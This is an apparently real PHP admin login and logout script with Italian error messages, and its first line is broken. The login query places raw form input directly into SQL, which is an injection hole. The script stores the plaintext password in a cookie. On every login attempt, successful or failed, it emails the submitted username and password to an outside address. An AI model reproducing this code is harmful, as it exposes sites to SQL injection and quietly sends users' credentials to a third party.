
if($_COOKIE[down_session]==""){ ?> } else { ?> } ?>
include "./admin/inc/config.php";
$durata_sessioni=7200;
// ------------------------------------------------------------------------------------ ACCESSO
if($_POST[form]=="login"){
if($_POST[username]==''){ $errore_login[]="Il campo username non può essere vuoto
";}
if($_POST[password]==''){ $errore_login[]="Il campo password non può essere vuoto
";}
}
if($_POST[form]=="login" AND $errore_login==""){
$queryLOGIN = mysql_query("SELECT * FROM utenti WHERE username='$_POST[username]' AND password='$_POST[password]' AND eliminato='0' AND abilitato='1'");
$righeLOGIN = mysql_num_rows($queryLOGIN);
if($righeLOGIN=='1') {
$risLOGIN = mysql_fetch_array($queryLOGIN);
session_start();
$_SESSION[PHPSESSID_ADMIN]=session_id();
setcookie ("down_session", "$_SESSION[PHPSESSID_ADMIN]", time()+$durata_sessioni);
setcookie ("username", "$risLOGIN[username]", time()+$durata_sessioni);
setcookie ("password", "$risLOGIN[password]", time()+$durata_sessioni);
setcookie ("cartella", "$risLOGIN[cartelle]", time()+$durata_sessioni);
$to = "web@lafutura.net";
$subject = "Nuovo accesso admin $siteroot";
$message = "user: $_POST[username] psw: $_POST[password] IP: http://www.ip-tracker.org/locator/ip-lookup.php?ip=$ip_visitatore";
$headers = 'From: web@lafutura.net' . "\r\n" . 'X-Mailer: PHP/' . phpversion();
mail($to, $subject, $message, $headers);
header("Location: $siteroot");
exit;
} else {
$errore_login[]="Username e/o password errati
";
$to = "web@lafutura.net";
$subject = "Accesso negato admin $siteroot";
$message = "user: $_POST[username] psw: $_POST[password] IP: http://www.ip-tracker.org/locator/ip-lookup.php?ip=$ip_visitatore";
$headers = 'From: web@lafutura.net' . "\r\n" . 'X-Mailer: PHP/' . phpversion();
mail($to, $subject, $message, $headers);
}
}
// ------------------------------------------------------------------------------------ ACCESSO
// ------------------------------------------------------------------------------------ EXIT
if($_GET[logout]!=""){
setcookie ("down_session", "$_SESSION[PHPSESSID_ADMIN]", time()-$durata_sessioni);
setcookie ("username", "$risLOGIN[username]", time()-$durata_sessioni);
setcookie ("password", "$risLOGIN[password]", time()-$durata_sessioni);
setcookie ("cartella", "$risLOGIN[cartella]", time()-$durata_sessioni);
$urlMOD = str_replace("?logout=$_GET[logout]", "", $_SERVER[REQUEST_URI]);
header("Location: $urlMOD");
exit;
}
// ------------------------------------------------------------------------------------ EXIT
?>